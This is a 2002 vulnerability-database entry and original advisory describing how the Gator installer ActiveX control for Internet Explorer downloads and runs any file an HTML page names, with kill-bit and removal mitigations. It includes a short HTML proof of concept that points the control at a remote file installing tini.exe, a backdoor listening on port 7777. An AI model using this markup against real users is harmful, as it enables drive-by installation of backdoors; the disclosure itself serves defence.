Gator Plugin for Microsoft Internet Explorer Lets Remote Users Install Arbitrary Software on the User's Host
|
Date: Feb 20 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Advisory: Eye on Security
|
Version(s): 3.0.6.1
|
Description: Eye on Security reported a vulnerability in the Gator plugin for Internet Explorer. A remote user can install software on the target user's host and gain access to the host.
The flaw is in the scriptable ActiveX component that installs the Gator software. The HTML page that instantiates the component hands it a parameter string, and the 'src' value in that string tells the component where to fetch the installation file from. The component downloads the file from that location and, if it is named setup.ex_, decompresses and executes it; an uncompressed file is executed as well. Nothing ties the download location to the vendor's site.
A remote user can therefore create an HTML page that instantiates the Gator installation component with a 'src' pointing at a trojan file, causing that file to be downloaded and run on the host of any user who loads the page with the component available.
A demonstration exploit is provided in the Source Message. The exploit installs 'tini.exe', a trojan that listens for connections on port 7777. Information about this trojan is available at:
http://www.ntsecurity.nu/toolbox/tini/
The demonstration exploit example is available at
http://eyeonsecurity.net/advisories/gatorexploit
|
Impact: A remote user can create an HTML page that, when loaded by another target user, will cause arbitrary code to be installed on the target user's computer.
|
Solution: No vendor solution was available at the time of this entry.
The author of the report recommends deleting the ActiveX component from %windir%\Downloaded Program Files.
Note that deleting the control only removes the installed copy: the next page that references the control's CLSID with a codebase URL will cause Internet Explorer to offer to download it again. To keep the control from being instantiated at all, set the kill bit for its CLSID (a Compatibility Flags DWORD value of 0x400 under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{29EEFF42-F3FA-11D5-A9D5-00500413153C}), or disable "Download signed ActiveX controls" for the Internet zone.
|
Vendor URL: www.gator.com/ (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Windows (Any)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Wed, 20 Feb 2002 17:31:59 -0500
Subject: Gator installer Plugin allows any software to be installed
|
Advisory Title: Gator installer Plugin allows any software to be
installed
Release Date: 21/01/2002
Application: Gator installer plugin for Internet Explorer (GAIN)
Platform: Windows clients with Internet Explorer.
DLL version - 3.0.6.1
Severity: Malicious users can install backdoor software and gain easy
access to the target machine.
Author:
Obscure^
[ obscure@eyeonsecurity.net ]
Vendor Status:
Not informed.
Web:
http://www.gator.com
http://eyeonsecurity.net/advisories/gatorieplugin.html
Background.
(extracted from
http://gator.com)
Features:
Fills in FORMS without typing!
Remembers PASSWORDS automatically
Protects and encrypts your data on YOUR computer
Gator comes bundled .. etc
The vulnerability exists in a plugin which installs the actual software.
This plugin is scriptable and allows an HTML page to specify the location of
the Gator installation. This ActiveX component is usually installed from
this page:
http://www.gator.com/download/msie.html
Problem.
The issue here is that any HTML page can specify the location of the
Gator installation file. The installation file is downloaded, then it is
checked for the filename. If the filename is setup.ex_, it is then
decompressed and executed. If the file is not compressed it will still
execute it. Of course using this method, a malicious user can easily
create an HTML page which makes use of the rogue ActiveX component to
point at a trojan file.
Exploit Example.
<xbject
id="IEGator"
classid="CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C"
codebase="http://www.gator.com/download/2500/iegator_3061_gatorsetup.cab"
align="baseline"
border="0"
width="400"
height="20">
<pxram name="params"
value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgcolor=F0F1D0& aic=",aicStr,"&">
</xbject>
I set up a small demonstration which installs tini.exe (which is a trojan
listening on port 7777).
If you need any information about tini.exe check out
http://www.ntsecurity.nu/toolbox/tini/.
The exploit example is found at :
http://eyeonsecurity.net/advisories/gatorexploit
Fix.
Simply delete the ActiveX component from %windir%\Downloaded Program
Files .. I think that should fix it.
Disclaimer.
The information within this document may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any consequences whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information lays within the user's
responsibility.
Feedback.
Please send suggestions, updates, and comments to:
Eye on Security
mail : obscure@eyeonsecurity.net
web : http://www.eyeonsecurity.net
|
|